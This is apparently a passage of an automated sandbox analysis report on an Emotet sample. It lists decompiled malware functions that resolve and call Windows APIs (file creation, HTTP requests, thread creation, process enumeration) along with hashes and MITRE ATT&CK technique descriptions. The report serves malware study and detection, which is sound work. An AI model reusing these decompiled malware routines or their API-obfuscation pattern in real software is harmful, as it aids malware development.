Function 0417554E, Relevance: 1.6, APIs: 1, Instructions: 70
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0417554E(long __ecx, void* __edx, long _a8, intOrPtr _a12, intOrPtr _a16, long _a24, long _a28, WCHAR* _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t52;
				void* _t62;
				signed int _t64;
				long _t69;

				_push(_a44);
				_t69 = __ecx;
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__ecx);
				E0417DD01(_t52);
				_v28 = 0x154152;
				_v24 = 0;
				_v20 = 0xd9b450;
				_t64 = 0x13;
				_v20 = _v20 * 0x15;
				_v20 = _v20 ^ 0x11da5878;
				_v16 = 0x819e9f;
				_v16 = _v16 << 0xc;
				_v16 = _v16 << 0xf;
				_v16 = _v16 ^ 0xf8009fdc;
				_v8 = 0xc29fd3;
				_v8 = _v8 >> 6;
				_v8 = _v8 / _t64;
				_v8 = _v8 ^ 0xb8ceb418;
				_v8 = _v8 ^ 0xb8c16474;
				_v12 = 0x1c984b;
				_v12 = _v12 << 1;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0x1c9bb1ac;
				E0418CDA7(0x35e, _t64, 0xbd10ff8e, _t64, 0x93a80dc1);
				_t62 = CreateFileW(_a32, _t69, _a28, 0, _a24, _a8, 0); // executed
				return _t62;
			}

0x04175556
0x0417555b
0x0417555d
0x04175560
0x04175563
0x04175566
0x04175569
0x0417556c
0x0417556d
0x04175570
0x04175573
0x04175576
0x04175578
0x04175579
0x0417557e
0x04175588
0x0417558d
0x0417559a
0x041755a1
0x041755a4
0x041755ab
0x041755b2
0x041755b6
0x041755ba
0x041755c1
0x041755c8
0x041755d6
0x041755d9
0x041755e0
0x041755e7
0x041755ee
0x041755f1
0x041755f5
0x0417560e
0x04175625
0x0417562c

APIs

CreateFileW.KERNEL32(?,00000001,00068E5A,00000000,0B29E473,F8009FDC,00000000), ref: 04175625

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 46e6f42166cbbf26909ec495d65940764ccf3f48b18f3f8b2176570695b90533
Instruction ID: 020126db061ff14ebd8339e44b1f7ff78aa17faec7953c4b5b8035cc4272950f
Opcode Fuzzy Hash: 46e6f42166cbbf26909ec495d65940764ccf3f48b18f3f8b2176570695b90533
Instruction Fuzzy Hash: 5E21E072801218BBCF05DF95CD498DEBBB5FF89708F018199F925A6220D3B19A20EF90

Uniqueness

Uniqueness Score: -1.00%

Function 0417E5E2, Relevance: 1.6, APIs: 1, Instructions: 67
networkCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E0417E5E2(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, void* _a12, intOrPtr _a20, WCHAR* _a24, intOrPtr _a28, long _a36, intOrPtr _a44) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t51;
				void* _t60;
				signed int _t62;

				_push(0);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0417DD01(_t51);
				_v12 = 0x7ddfc4;
				_v12 = _v12 ^ 0xc1e5a483;
				_t62 = 0x61;
				_v12 = _v12 / _t62;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x00008f84;
				_v20 = 0x6f648f;
				_v20 = _v20 ^ 0xc844a0fd;
				_v20 = _v20 ^ 0xc825441e;
				_v16 = 0x45c8d9;
				_v16 = _v16 + 0xffffb68f;
				_v16 = _v16 | 0xbb87cfb3;
				_v16 = _v16 ^ 0xbbc55935;
				_v8 = 0x4f8f87;
				_v8 = _v8 | 0xcec186ef;
				_v8 = _v8 + 0xffff5618;
				_v8 = _v8 ^ 0x9ff1da76;
				_v8 = _v8 ^ 0x513c36dc;
				E0418CDA7(0xa7, _t62, 0x2d8c49fa, _t62, 0x9220e184);
				_t60 = HttpOpenRequestW(_a12, _a4, _a24, 0, 0, 0, _a36, 0); // executed
				return _t60;
			}

0x0417e5eb
0x0417e5ec
0x0417e5ef
0x0417e5f0
0x0417e5f3
0x0417e5f4
0x0417e5f7
0x0417e5fa
0x0417e5fd
0x0417e5fe
0x0417e601
0x0417e604
0x0417e609
0x0417e60e
0x0417e618
0x0417e626
0x0417e62e
0x0417e631
0x0417e635
0x0417e63c
0x0417e643
0x0417e64a
0x0417e651
0x0417e658
0x0417e65f
0x0417e666
0x0417e66d
0x0417e674
0x0417e67b
0x0417e682
0x0417e689
0x0417e6a8
0x0417e6c0
0x0417e6c6

APIs

HttpOpenRequestW.WININET(C825441E,00008F84,?,00000000,00000000,00000000,?,00000000), ref: 0417E6C0

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: HttpOpenRequest
String ID:
API String ID: 1984915467-0
Opcode ID: 85f3d0f290ca872c31aa33fabd3fbaa69e46cf488996f8b1005650a9d93c1e1d
Instruction ID: 47c8aaed6042cfd807e285c60ace398830067731dcf0c001c0d7dedae5248c4b
Opcode Fuzzy Hash: 85f3d0f290ca872c31aa33fabd3fbaa69e46cf488996f8b1005650a9d93c1e1d
Instruction Fuzzy Hash: 5F21337280121DFFDF14DFA5CC498EEBF75EF04254F108188F92866120D3719A60DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04192291, Relevance: 1.6, APIs: 1, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E04192291(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, long _a12, long _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t51;
				void* _t64;
				signed int _t66;
				signed int _t67;
				signed int _t68;
				void* _t76;

				_push(_a16);
				_t76 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0417DD01(_t51);
				_v16 = 0x324a0;
				_v16 = _v16 | 0x6e886a12;
				_v16 = _v16 ^ 0x0321e4df;
				_v16 = _v16 ^ 0x6dabb2d4;
				_v12 = 0x57b852;
				_v12 = _v12 + 0x14d;
				_t66 = 0x7d;
				_v12 = _v12 / _t66;
				_v12 = _v12 ^ 0x000abae6;
				_v20 = 0x77ddf9;
				_v20 = _v20 + 0x8db2;
				_v20 = _v20 ^ 0x007de80c;
				_v8 = 0x604bc4;
				_t67 = 0x18;
				_v8 = _v8 / _t67;
				_v8 = _v8 << 3;
				_t68 = 0x44;
				_v8 = _v8 / _t68;
				_v8 = _v8 ^ 0x00054f4b;
				E0418CDA7(0x2a, _t68, 0xbd10ff8e, _t68, 0xba3519d7);
				_t64 = RtlAllocateHeap(_t76, _a16, _a12); // executed
				return _t64;
			}

0x04192298
0x0419229b
0x0419229d
0x041922a0
0x041922a3
0x041922a6
0x041922a8
0x041922ad
0x041922b7
0x041922c0
0x041922c7
0x041922ce
0x041922d5
0x041922e1
0x041922e6
0x041922eb
0x041922f2
0x041922f9
0x04192300
0x04192307
0x04192311
0x04192316
0x0419231b
0x04192322
0x0419232a
0x0419232d
0x04192349
0x04192358
0x0419235e

APIs

RtlAllocateHeap.NTDLL(00000000,?,007DE80C), ref: 04192358

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f1cb90980e2c2fe389c435dde86f2da50f7f9d8122bac32300e14d88e190cd3f
Instruction ID: 72a15e80c84ee3494f63a94a3dfcffa752fc391ce5188b3ec5be14238337c3df
Opcode Fuzzy Hash: f1cb90980e2c2fe389c435dde86f2da50f7f9d8122bac32300e14d88e190cd3f
Instruction Fuzzy Hash: 20213872D00208FBEF04DF94C84A9DEBBB2EF44314F10C199E91466250E7B65B249B91

Uniqueness

Uniqueness Score: -1.00%

Function 04181AE6, Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E04181AE6(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, _Unknown_base(*)()* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t48;
				void* _t58;
				signed int _t59;

				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0417DD01(_t48);
				_v20 = 0x115e6f;
				_v20 = _v20 << 2;
				_v20 = _v20 | 0x4b18a736;
				_v20 = _v20 ^ 0x4b5a989e;
				_v16 = 0xc232b9;
				_v16 = _v16 + 0xffff612c;
				_v16 = _v16 ^ 0x3f1a08f0;
				_v16 = _v16 ^ 0x3fd10b9b;
				_v8 = 0x65f73e;
				_t59 = 0x34;
				_v8 = _v8 / _t59;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 * 0x6d;
				_v8 = _v8 ^ 0x000f3e85;
				_v12 = 0x8a7d61;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0x75c8;
				_v12 = _v12 ^ 0x001dcd81;
				E0418CDA7(0x55, _t59, 0xbd10ff8e, _t59, 0x23b394b8);
				_t58 = CreateThread(0, 0, _a36, _a12, 0, 0); // executed
				return _t58;
			}

0x04181aed
0x04181af2
0x04181af3
0x04181af6
0x04181af9
0x04181afc
0x04181afd
0x04181b00
0x04181b03
0x04181b06
0x04181b07
0x04181b08
0x04181b0d
0x04181b17
0x04181b1d
0x04181b24
0x04181b2b
0x04181b32
0x04181b39
0x04181b40
0x04181b47
0x04181b53
0x04181b5b
0x04181b5e
0x04181b6f
0x04181b72
0x04181b79
0x04181b80
0x04181b84
0x04181b8b
0x04181b9e
0x04181bb0
0x04181bb6

APIs

CreateThread.KERNEL32(00000000,00000000,?,4B5A989E,00000000,00000000), ref: 04181BB0

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 5f979e883976f6ff8f2ab677287aa28c605ea083d0ccd4633d7f7a0c6ed90c8f
Instruction ID: d9ab5c4dd38e10bf5bb858c4454de89c1f25fc06dc48cab7c9f1e8202c77426a
Opcode Fuzzy Hash: 5f979e883976f6ff8f2ab677287aa28c605ea083d0ccd4633d7f7a0c6ed90c8f
Instruction Fuzzy Hash: 18212F71C01229BBCF25DFA5CD4A8DFBFB5EF09354F008188E91866250D3B25A24EF90

Uniqueness

Uniqueness Score: -1.00%

Function 0417562D, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0417562D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, struct tagPROCESSENTRY32W* _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				void* _t49;
				signed int _t51;
				void* _t55;

				_push(_a16);
				_t55 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0417DD01(_t40);
				_v20 = 0x50731d;
				_t51 = 0x33;
				_v20 = _v20 * 0x5d;
				_v20 = _v20 ^ 0x1d3ddbd7;
				_v16 = 0xad1fb7;
				_v16 = _v16 + 0x666;
				_v16 = _v16 ^ 0xf7e3bbdd;
				_v16 = _v16 ^ 0xf74e646a;
				_v12 = 0x651915;
				_v12 = _v12 ^ 0x8ac032d8;
				_v12 = _v12 / _t51;
				_v12 = _v12 ^ 0x02b78f0a;
				_v8 = 0x9a7d55;
				_v8 = _v8 >> 7;
				_v8 = _v8 + 0x55f3;
				_v8 = _v8 ^ 0x000e05a7;
				_t49 = E0418CDA7(0x224, _t51, 0xbd10ff8e, _t51, 0x3d4f7ccb);
				Process32FirstW(_t55, _a12); // executed
				return _t49;
			}

0x04175634
0x04175637
0x04175639
0x0417563c
0x0417563f
0x04175643
0x04175644
0x04175649
0x0417565b
0x0417565c
0x0417565f
0x04175666
0x0417566d
0x04175674
0x0417567b
0x04175682
0x04175689
0x0417569a
0x0417569d
0x041756a4
0x041756ab
0x041756af
0x041756b6
0x041756d5
0x041756e1
0x041756e7

APIs

Process32FirstW.KERNEL32(?,1D3DDBD7), ref: 041756E1

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: FirstProcess32
String ID:
API String ID: 2623510744-0
Opcode ID: a418d4d4c0b9f068693d3d3b8d383d9a4317924dd1ed4e7b74b66e96727bd2e6
Instruction ID: 919bf7ba0ad213c7efce093604a1eb92b38098bd6312d28a142d6ea0b06e5afa
Opcode Fuzzy Hash: a418d4d4c0b9f068693d3d3b8d383d9a4317924dd1ed4e7b74b66e96727bd2e6
Instruction Fuzzy Hash: 9C112672D0121CBFDB05DFE4D94A8EEBBB6FF05304F008989E821A6250D3B56B159F91

Uniqueness

Uniqueness Score: -1.00%

Function 04181710, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E04181710(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t38;
				intOrPtr* _t46;
				void* _t47;
				signed int _t49;
				void* _t53;

				_t53 = __edx;
				E0417DD01(_t38);
				_v16 = 0xa4d53e;
				_v16 = _v16 + 0xffff0182;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x0a3a05dc;
				_v12 = 0x8966f3;
				_v12 = _v12 + 0xffffbeaf;
				_v12 = _v12 | 0x1cada743;
				_v12 = _v12 ^ 0x1ca35eaf;
				_v20 = 0x4cd6c6;
				_v20 = _v20 ^ 0x18cb065d;
				_v20 = _v20 ^ 0x1887a50a;
				_v8 = 0x42047e;
				_t49 = 0x3d;
				_v8 = _v8 / _t49;
				_v8 = _v8 + 0xa717;
				_v8 = _v8 + 0xffffc02f;
				_v8 = _v8 ^ 0x000f64f8;
				_t46 = E0418CDA7(0x23a, _t49, 0xbd10ff8e, _t49, 0xf7565b34);
				_t47 =  *_t46(_t53, __ecx, __edx, _a4); // executed
				return _t47;
			}

0x0418171a
0x0418171e
0x04181723
0x0418172d
0x04181736
0x0418173a
0x04181741
0x04181748
0x0418174f
0x04181756
0x0418175d
0x04181764
0x0418176b
0x04181772
0x0418177e
0x04181786
0x04181789
0x04181790
0x04181797
0x041817b6
0x041817bf
0x041817c5

APIs

GetNativeSystemInfo.KERNEL32 ref: 041817BF

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: f794af0ea693588e15e98646476749cb9a154713387d622fb9edc86c07ada40f
Instruction ID: 472dcfd1bf4878af3e759c6c55de8c217c385e70bf5e87b3d987eb8aac6f542f
Opcode Fuzzy Hash: f794af0ea693588e15e98646476749cb9a154713387d622fb9edc86c07ada40f
Instruction Fuzzy Hash: 0D1166B0D0131CBBDB44EFE8D84A89EBBB4EF01314F108288E565A7260D3B56F159F91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report NjTYb3VyzV

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Function 0473FCD8, Relevance: 28.6, Strings: 22, Instructions: 1114
COMMONCrypto

Function 10003097, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 153
librarymemorywindowCOMMON

Function 100027F9, Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 309
memoryCOMMON

Function 1001083A, Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre